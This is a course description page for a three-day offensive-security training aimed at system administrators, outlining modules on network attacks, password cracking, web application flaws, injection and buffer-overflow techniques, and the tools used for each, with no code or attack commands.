Know Thy Enemy
Duration: 3 days

Back to course list Home
Synopsis This course focuses on application security - but from the hacker's perspective. Hacker tools and techniques are explained with many practical examples. Students obtain hands-on experience not just in using the tools, but working to defend against them. Common and widely used exploits are analyzed and ways to remediate them are explained.
Target Audience System Administrators and security officers who wish to gain insight on how to better defend their systems by getting to know how hackers operate. (Developers looking for insight into secure coding techniques should consider the Secure Programming Seminar)
  • Understand the hacker "mindset"
  • Explain vulnerabilities and methods of exploitation
  • Use common hacking tools
  • Understand and demonstrate privilege escalation
  • Understand and demonstrate Code, SQL and Script injection
  • Analyze and explain forensic data
Exercises This course is an a 60%/40% mix of theory and practice. Using virtual machines, we simulate real life scenarios of attacking remote Windows and Linux servers. Guided exercises demonstrate the myriad tools and techniques employed by hackers. A theory only course can be completed in two days. Hands on require an additional day.
1. The hacker methodology
2 hours
Before we get to the actual attacks, we lay down the foundations by describing the methodology and modus operandi. We define the terminology and nomenclature of information security, and illustrate the three stages of a successful hack
  • Reconnaissance: Gathering infromation on remote targets
    • Infiltration: The attack
      • Propagation: Strengthening hold and infiltrating related systems
        2. Network (in)security
        2 hours
        Starting with network layer insecurities, we discuss issues in Layers II, III and IV: Ethernet, IP, and TCP/UDP weaknesses that are inherent in the protocol design. Topics include:
        • Scanning - Using ICMP, TCP and UDP to gather data on remote targets, including fingerprinting the operating system versions
          • Sniffing - Intercepting network traffic in both wired and wireless environments. Focus on Wi-Fi environments and WEP encryption cracking
            • Spoofing - Masquerading network traffic for purposes of impersonation
              • Tunneling - Establishing covert channels over "normal" network traffic.
                • Denial of Service - malforming traffic itself for attack purposes.
                  • Tools:
                    • NMap
                      • Nessus
                        • WinFingerPrint
                        3. All your secrets are ours
                        2 hours
                        A primer on encryption, explaining the ideas behind symmetricm asymmetric cryptography and hash functions.
                        • Fundamentals of cryptography
                          • Storing passwords
                            • Traditional UNIX hashes (DES)
                              • UNIX ECF passwords (MD5, AES...)
                                • Windows Passwords
                                • Tools
                                  • Jack the ripper
                                    • L0phtCrack
                                    4. Application Security
                                    2 hours
                                    The basic principles of application security. Explaining how and what can go wrong in seemingly innocuous applications. Possible outcomes of vulnerabilities in user applications, including:
                                    • Information Leakage - disclosure of private and/or sensitive information under incorrect circumstances
                                      • Denial of Service - application/system crashes intentionally induced by a hacker attack
                                        • Logic Subversion - overriding application decision making capabilities and tricking unintended, and insecure functionality
                                          • Injection - Introduction of foreign files/scripts/SQL/code into an application, thereby overriding its logic and wresting control
                                            5. Interlude: Web Applications
                                            2 hours
                                            Basic concepts in web applications. The world wide web is the most common platform for attacks. In order to understand specific vulnerabilities, we need to first elaborate on the aspects in which web application are similar to or different from traditional programs.
                                            • HTTP - The Hyper Text Transfer Protocol
                                              • Input in HTML forms. Important tags, GETs vs. POSTs
                                                • Javascript
                                                  • OWASP - Top 10 vulnerabilities
                                                    • Cross Site Scripting (XSS) and Javascript injection
                                                      • Cross Site Request Forgery (XSRF)
                                                        • Tools
                                                          • OWASP WebScarab
                                                            • Acunetix vulnerability scanner
                                                            6. Application Security faults
                                                            4 hours
                                                            Common faults in applications, including:
                                                            • Directory Traversals - breaking out of the application's intended directory
                                                              • Escaping attacks - providing malformed input that intentionally bypasses security checks
                                                                • Poison Null Bytes
                                                                  • Command Injection - Supplying foreign operating system commands
                                                                    • SQL Injection - Breaking into databases by providing corrupt input with intentional malformation of database logic
                                                                      7. Code Injection Attacks
                                                                      4 hours
                                                                      Techniques for injecting code into legacy (C/C++) applications
                                                                      • Buffer Overflows
                                                                        • Format string Attacks
                                                                          • Integer Overflows
                                                                            • Return Oriented Programming Attacks
                                                                              • Tools
                                                                                • MetaSploit
                                                                                  • ROPGadget